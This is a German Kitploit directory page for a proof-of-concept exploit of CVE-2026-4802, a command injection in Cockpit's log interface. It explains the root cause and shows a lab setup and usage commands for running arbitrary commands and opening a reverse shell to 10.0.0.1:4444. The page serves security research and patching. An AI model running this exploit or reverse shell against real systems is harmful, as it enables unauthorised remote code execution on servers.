Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/hakaioffsec/cve-2026-4802
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubhakaioffsec/cve-2026-4802

CVE-2026-4802

Proof-of-Concept-Exploit für CVE-2026-4802, eine Befehlsinjektions-Schwachstelle in der Systemprotokoll-Oberfläche von Cockpit, die die Ausführung beliebiger Befehle und Reverse Shells ermöglicht.

Repository anzeigen
414vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-4802 - Remote Code Execution durch Command Injection in Cockpit

Ein Proof-of-Concept-Exploit für CVE-2026-4802, eine Remote Code Execution durch Command Injection in der Systemprotokoll-Oberfläche von Cockpit (loadServiceFilters())

Einrichtung

Die verwundbare Umgebung erstellen und ausführen:

root@kitploit:~
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln

Verwendung

root@kitploit:~
# Prüfen, ob das Ziel verwundbar ist
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check

# Beliebige Befehle ausführen
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"

# Reverse Shell
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444

Verwundbare Versionen

  • Cockpit (ungepatchte Versionen mit pkg/systemd/logsJournal.jsx)

Grundursache

Die Funktion loadServiceFilters() in pkg/systemd/logsJournal.jsx erstellt Shell-Befehle, indem Arrays zu Strings zusammengefügt werden, wobei nur Leerzeichen escaped werden, bevor sie an /bin/bash -ec übergeben werden. Benutzergesteuerte Parameter aus dem URL-Fragment der Protokollseite (z. B. --since=) erreichen diesen Codepfad unbereinigt, was die Injektion von Shell-Metazeichen wie Befehlssubstitution ($(...)) ermöglicht.

Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und Forschungszwecken. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie ausdrücklich die Erlaubnis zum Testen haben. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.

QuimeraX Intelligence

QuimeraX Intelligence ist eine fortschrittliche EASM- und Cyber-Threat-Intelligence-Plattform, die sich auf die Identifizierung kritischer Schwachstellen in komplexen Systemen spezialisiert hat. Die Plattform überwacht, erkennt und meldet Sicherheitsbedrohungen proaktiv an Kunden und gewährleistet Transparenz und schnelle Reaktion auf potenzielle Risiken. Kunden erhalten sofortige Benachrichtigungen und umfassende Berichte, wenn ihre Systeme als verwundbar eingestuft werden, sodass sie Schutzmaßnahmen ergreifen können. mehr erfahren

Hakai Security

Hakai Security ist ein Cybersicherheitsunternehmen, das von Sicherheitsexperten gegründet wurde und sich technischer Exzellenz verpflichtet fühlt. Wir bieten maßgeschneiderte Sicherheitslösungen an, darunter fortgeschrittene Penetrationstests, realistische Red-Team-Simulationen und sichere Entwicklungspraktiken, um die Vermögenswerte unserer Kunden proaktiv vor sich entwickelnden Cyber-Bedrohungen zu schützen.

Referenzen

  • https://bugzilla.redhat.com/show_bug.cgi?id=2451155
  • https://access.redhat.com/security/cve/CVE-2026-4802
  • https://www.cve.org/CVERecord?id=CVE-2026-4802
Tool herunterladen